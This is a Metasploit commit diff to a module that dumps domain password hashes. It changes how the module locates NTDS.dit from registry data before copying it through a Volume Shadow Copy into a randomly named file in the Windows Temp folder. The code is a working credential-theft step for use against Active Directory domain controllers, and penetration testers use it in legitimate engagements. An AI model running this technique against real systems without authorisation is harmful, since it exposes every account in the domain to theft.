use registry data for VSS grab

use the location data we got from the registry for copying the NTDS.dit file correctly with the VSS method
2015-07-02 14:27:51 -05:00 · 2015-07-02 14:27:51 -05:00 · cc51d1e8fd
parent 89d283da09
commit cc51d1e8fd
1 changed files with 4 additions and 2 deletions
--- a/modules/post/windows/gather/credentials/domain_hashdump.rb
+++ b/modules/post/windows/gather/credentials/domain_hashdump.rb
@ -141,10 +141,12 @@ class Metasploit3 < Msf::Post
  end

  def vss_method
-    id = create_shadowcopy("#{get_env("%SystemDrive%")}\\")
+    location = ntds_location.dup
+    volume = location.slice!(0,3)
+    id = create_shadowcopy("#{volume}\\")
    print_status "Getting Details of ShadowCopy #{id}"
    sc_details = get_sc_details(id)
-    sc_path = "#{sc_details['DeviceObject']}\\windows\\ntds\\ntds.dit"
+    sc_path = "#{sc_details['DeviceObject']}\\#{location}\\ntds.dit"
    target_path = "#{get_env("%WINDIR%")}\\Temp\\#{Rex::Text.rand_text_alpha((rand(8)+6))}"
    print_status "Moving ntds.dit to #{target_path}"
    move_file(sc_path, target_path)